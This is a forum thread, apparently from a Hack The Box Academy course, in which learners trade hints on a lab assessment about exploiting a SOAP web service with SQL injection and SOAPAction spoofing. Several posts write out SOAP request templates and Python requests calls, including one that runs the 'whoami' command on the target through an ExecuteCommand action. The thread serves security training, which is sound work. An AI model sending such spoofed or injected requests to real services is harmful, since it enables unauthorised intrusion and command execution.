Hey has anyone finished this assessment via the SQL payload?
I got the flag rather quick considering its 13 points and not via the way the question implies. I feel I’m missing out on learning here.
2 Likes
Hi. Me to cant find where I cant try SQL payload.
In http://<TARGET IP>:3002/wsdl?wsdl I just find SOAP spoofing RCE like in first part of module. But If i use this RCE on port 3002 I cant find another sql table in mysql :C Just “htb” table with previus SQLi questions. Can anyone help me 
Hi,
A few hints:
- Start by carefully examining the WSDL file: identify data types and parameters that might be vulnerable to SQL injection.
- Try the most common SQL injections. The SQL Injections Fundamentals module helped me, especially the “subverting query logic” section.
- The service responds once you have found a working SQL injection. In other cases, it usually does not respond.
8 Likes
thx m8! Took more time with this potentially dangerous place, tried combinations, and WOW!
@akiraowen, I think you are missing out on a learning opportunity if you didn’t get this via SQLi. I did the same thing as you probably did at first and got the flag within 5 minutes.
However, I went back to get the flag with a SQLi payload. I think modifying the SOAP request was actually the hardest part haha. It took me around 40 minutes all said and done, but was well worth it. Thanks to @lvruibr for helping me get my head in the right place. I actually didn’t even see the part about the service hanging in the question.
-onthesauce
2 Likes
This is the longest I’ve been stuck on a module. I feel like I’m missing something obvious, I’ve modified a soap request so it’s accepted but SQLmap is returning nothing I’m not sure if I’m meant to be using it.
Is the solution in submitting a correctly formatted soap request itself?
Okay I did it, I was definitely over complicating it!
Did you do this via SQLMap?
No, I used manual injection but I didn’t use the python RCE scripts. I crafted the SOAP request.
Someone can help me for a flag?
I use the python script and I retrieve the mysql data from u**** table but I don’t find “password” field.
I found HTB{FL4G} but I don’t know use it.
HI , I was hoping to get a hint in the right direction - i added burp extension Wsdler , and tried to find sql injection in two Endpoints. I have not been able to find anything and am lost at this point. I have used multiple requests in SQLmap , and have had no luck, any help would be great - thanks
Any tips on how you found the flag. pm me ?
Same Problem, has someone a Hint for me? thx.
Did anyone solve this without doing SQLi? I figured it out doing RCE. I just wanted to know how it was done through SQLi.
1 Like
I’m having no luck modifying the soap request. a little help would be much appreciated
How is your SOAP request structured? Make sure you have the right elements in there.
<s:element name="LoginRequest">
<s:complexType>
<s:sequence>
<s:element minOccurs="1" maxOccurs="1" name="username" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="password" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
I always recommend working with the automate.py program, but then modifying it so that it has the right elements and the right action. Read the wsdl for the element names and action name to use. If you need a hint on what an element looks like in a SOAP request, then just look at the cmd element in the automate.py script before you modify it.
-onthesauce
3 Likes
I’ll DM you.
Hope this isn’t too much…
I have been receiving a ton of requests for help. Just figured it would be easier to drop something here to give the community help in building SOAP requests in order to accomplish SQLi. If you don’t know what SQLi payloads to use and it hasn’t hit by the time you are done reading this, then go reread the SQL Fundamentals module.
This is the execute command python payload broken down. Note the ExecuteCommandRequest in the body, the <cmd></cmd> elements within it, and the SOAPAction in the POST request at the bottom.
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
<soap:Body>
<ExecuteCommandRequest xmlns="http://tempuri.org/">
<cmd>whoami</cmd>
</ExecuteCommandRequest>
</soap:Body>
</soap:Envelope>
print(requests.post("http://<TARGET IP>:3002/wsdl", data=payload, headers={"SOAPAction":'"ExecuteCommand"'}).content)
Before even beginning the Skill Assessment, I really recommend taking another shot at the SOAPAction Spoofing module because it basically helps you build the request, but takes the approach of executing a command. We are going to replicate making a login request. Take a look at the wsdl and look at the schema for the LoginRequest element.
This section tells you everything that is required for making a login request via SOAP. Similar to the ExecuteCommandRequest above, the login request MUST contain an element named username and one named password. Those elements are similar to the <cmd></cmd> elements above.
<s:element name="LoginRequest">
<s:complexType>
<s:sequence>
<s:element minOccurs="1" maxOccurs="1" name="username" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="password" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
Next look at the wsdl and find the actions that can be completed. This is important because you need to declare it in the header of the POST request and it tells it which operation to use:
<!-- SOAP Login Action -->
<wsdl:operation name="Login">
<soap:operation soapAction="Login" style="document"/>
<!-- SOAP ExecuteCommand Action -->
<wsdl:operation name="ExecuteCommand">
<soap:operation soapAction="ExecuteCommand" style="document"/>
Now you should have everything needed to build the SOAP Login Request, just use the payload/python template in the module and posted above:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
<soap:Body>
<LoginRequest xmlns="http://tempuri.org/">
<username>onthesauce</username>
<password>admin</password>
</LoginRequest>
</soap:Body>
</soap:Envelope>
print(requests.post("http://<TARGET IP>:3002/wsdl", data=payload, headers={"SOAPAction":'"Login"'}).content)
This doesn’t get you the flag, I just want to help show how I went about building the SOAP LoginRequest. I will let you do the leg work of putting it into a script because I put each part on a newline and that will break the script. I recommend copying the payload/python template from the beginning and changing it yourself.
Edit: I forgot to mention, if all goes well and you do it correctly, it should hang. Meaning you run it and it does nothing, it doesn’t stop, it doesn’t error, you should have to use a keyboard interrupt to stop it. That is how you know it worked.
Cheers.
-onthesauce
11 Likes
It breaks the payload! I recommend using python f-string substitution to dump payloads into the script. Look at how they do it in automate.py for a good example.
Basically:
userinput = input("User input here: ")
# Anything input into the userinput variable will
# get substituted right into the payload without breaking it.
fstring_payload_example = f"XML-Payload Stuff {userinput} more payload stuff"
If someone knows why it doesn’t break the XML, please let us know. To be honest, I am too busy(lazy) right now to dig into it.
-onthesauce
2 Likes